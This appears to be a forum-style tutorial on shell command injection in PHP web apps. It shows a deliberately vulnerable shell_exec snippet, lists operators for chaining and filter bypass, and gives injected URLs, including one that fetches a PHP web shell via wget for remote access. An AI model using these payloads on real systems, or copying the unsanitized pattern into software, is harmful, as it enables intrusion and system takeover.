Shell/Command Injection


sqlInjection

Shell/Command Injection

What you will need:

  • At least a basic knowledge of unix systems
  • A brain

[0x0a]Overview:
The whole point of command injection is to inject and execute malicious commands specified by the attacker in the vulnerable application. Most of the time, web applications need to use backend programs or applications to their advantage in order to complete some functionality. This can prove to be disastrous because developers get lazy and don’t take proper measures to secure their scripts. This most likely leads to their system being compromised(lel)

Example of poor, lazy coding:

<?php
echo shell_exec('cat '.$_GET['filename']);
?>

Why is this a problem?
I’m glad you asked. In case you don’t have any knowledge on PHP, this script accepts user input and is not sanitized, which is bad D: In a normal situation a user might go to a link like:

www.examplesite.com/viewcontent.php?filename=example.txt

And it would display some example text:

Quote

Here is some visible content, blah blah

Okay so all I have to do now is add a nice little semi-colon and a shell command to exploit this.

www.examplesite.com/viewcontent.php?filename=example.txt; ls

The output would be something like:

Here is some visible content, blah blah
example.txt
config.php
IchiIsAwesome.txt

[0x0b]How to perform an attack:
In the last section I showed you a basic example of how command injection works. Now we’re gonna talk about different injections and how they’re executed.

It’s reasonable to assume that a develeoper with half a brain would filter out some of the most common forms of command injection, such as the semi-colon. Well, there’s ways around that :D Here’s some operators you can use:

Pipes
Example: |

Pipes allow the user to chain multiple commands together. It will redirect the output of one command straight to the next, so, you can execute unlimited commands by chaining them with multiple pipes. Cool? Yes.

Inline commands
Example: ; and $

Here you find the semi-colon in the original example. Adding a semicolon tells the command line to execute everything before the semicolon, then execute everything after like it’s on a fresh command line.

Logical Operators
Example: $ and && and ||

These operators perform logical operations against the data, simple as that.

How they’re used:

  • `shell_command` – executes the command
  • $(shell_command) – executes the command
  • | shell_command – executes the command and returns the output of the command
  • || shell_command – executes the command and returns the output of the command
  • ; shell_command – executes the command and returns the output of the command
  • && shell_command executes the command and returns the output of the command
  • > target_file – overwrites the target file with the output of the previous command
  • >> target_file – appends the target file with the output of the previous command
  • < target_file – send contents of target_file to the previous command

These are just a few examples of command injection vectors, get creative and use your imagination. If you have knowledge on the system you’re exploiting, it shouldn’t be hard.

Example:
Spawn shell

www.example.com/viewcontent.php?file=example.txt&amp;&amp; wget [location of php shell]

Locate shell

www.example.com/viewcontent.php?file=example.txt&amp;&amp; ls -X

Access shell!

[0x0c]Conclusion:
Command Injection is a extremely dangerous vulnerability as it can be used to escalate privileges on the system and gain complete control. It usually goes something like this:

  • Establish a custom script that serves as a shell
  • Monitor processes and audit the system
  • Find other vulnerabilities and exploit them. Gain control. ???. Profit

All you need to exploit this deadly vulnerability is knowledge of the system you’re exploiting, either *nix or winhoes, and patience. I know it was a quick tutorial but there’s only so much I could write about before it became complete and utter spoon-feeding, and no one really benefits from that. Hope you enjoyed reading. I welcome constructive criticism on what I should add or take out and tips for future tuts, thanks :D

source:z+

Loading Facebook Comments ...

Simply dummy text of the printing and typesetting industry.

Login


2 × = ten


Login form protected by Login LockDown.


Lost your password?